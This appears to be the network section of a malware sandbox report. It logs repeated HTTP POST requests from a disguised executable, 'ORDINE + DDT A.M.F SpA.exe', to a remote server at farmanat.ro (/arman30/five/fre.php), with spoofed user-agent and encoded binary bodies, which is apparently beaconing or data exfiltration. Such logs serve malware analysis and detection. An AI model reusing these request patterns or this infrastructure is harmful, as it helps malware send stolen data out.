                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:12.958539963 CET6331INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              180192.168.11.2050021176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              181192.168.11.2050022176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              182192.168.11.2050023176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              183192.168.11.2050024176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              184192.168.11.2050025176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              185192.168.11.2050026176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              186192.168.11.2050027176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              187192.168.11.2050029176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              188192.168.11.2050030176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              189192.168.11.2050031176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              19192.168.11.2049854176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:13.646368980 CET6331OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:13.730961084 CET6332INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:12 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              190192.168.11.2050032176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              191192.168.11.2050033176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              192192.168.11.2050034176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              193192.168.11.2050035176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              194192.168.11.2050036176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              195192.168.11.2050037176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              196192.168.11.2050038176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              197192.168.11.2050039176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              198192.168.11.2050040176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              199192.168.11.2050041176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.11.2049821176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:00.994992018 CET6299OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 3206
                                              Connection: close
                                              Nov 25, 2021 10:48:01.080023050 CET6302INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:00 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              20192.168.11.2049855176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:14.406984091 CET6333OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:14.524874926 CET6333INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:13 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              200192.168.11.2050042176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              201192.168.11.2050043176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              202192.168.11.2050044176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              203192.168.11.2050045176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              204192.168.11.2050046176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              205192.168.11.2050047176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              206192.168.11.2050048176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              207192.168.11.2050049176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              208192.168.11.2050050176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              209192.168.11.2050051176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              21192.168.11.2049856176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:15.068809032 CET6334OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:15.152544022 CET6335INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:14 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              210192.168.11.2050052176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              211192.168.11.2050053176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              212192.168.11.2050054176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              213192.168.11.2050055176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              214192.168.11.2050056176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              215192.168.11.2050057176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              216192.168.11.2050058176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              217192.168.11.2050059176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              218192.168.11.2050060176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              219192.168.11.2050061176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              22192.168.11.2049857176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:15.740662098 CET6335OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:15.825707912 CET6336INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:14 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              220192.168.11.2050062176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              221192.168.11.2050063176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              222192.168.11.2050064176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              223192.168.11.2050065176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              224192.168.11.2050066176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              225192.168.11.2050067176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              226192.168.11.2050068176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              227192.168.11.2050069176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              228192.168.11.2050070176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              229192.168.11.2050071176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              23192.168.11.2049858176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:16.437510014 CET6337OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:16.523509979 CET6337INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:15 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              230192.168.11.2050072176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              231192.168.11.2050073176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              232192.168.11.2050074176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              233192.168.11.2050075176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              234192.168.11.2050076176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              235192.168.11.2050077176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              236192.168.11.2050078176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              237192.168.11.2050079176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              238192.168.11.2050080176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              239192.168.11.2050081176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              24192.168.11.2049859176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:17.100651979 CET6338OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:17.190354109 CET6339INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              240192.168.11.2050082176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              241192.168.11.2050083176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              242192.168.11.2050084176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              243192.168.11.2050085176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              244192.168.11.2050086176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              245192.168.11.2050087176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              246192.168.11.2050088176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              247192.168.11.2050089176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              248192.168.11.2050090176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              249192.168.11.2050091176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              25192.168.11.2049860176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:17.734632015 CET6339OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:17.821785927 CET6340INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              250192.168.11.2050092176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              251192.168.11.2050093176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              252192.168.11.2050094176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              253192.168.11.2050095176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              254192.168.11.2050096176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              255192.168.11.2050097176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              256192.168.11.2050098176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              257192.168.11.2050099176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              258192.168.11.2050100176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              259192.168.11.2050101176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              26192.168.11.2049861176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:18.417273998 CET6341OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:18.506346941 CET6341INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:17 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              260192.168.11.2050102176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              261192.168.11.2050103176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              262192.168.11.2050104176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              263192.168.11.2050105176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              264192.168.11.2050106176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              265192.168.11.2050107176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              266192.168.11.2050108176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              267192.168.11.2050109176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              268192.168.11.2050110176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              269192.168.11.2050111176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              27192.168.11.2049862176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:19.071831942 CET6342OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:19.155915022 CET6343INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:18 GMT
                                              Content-Type: text/html; charset=UTF-8
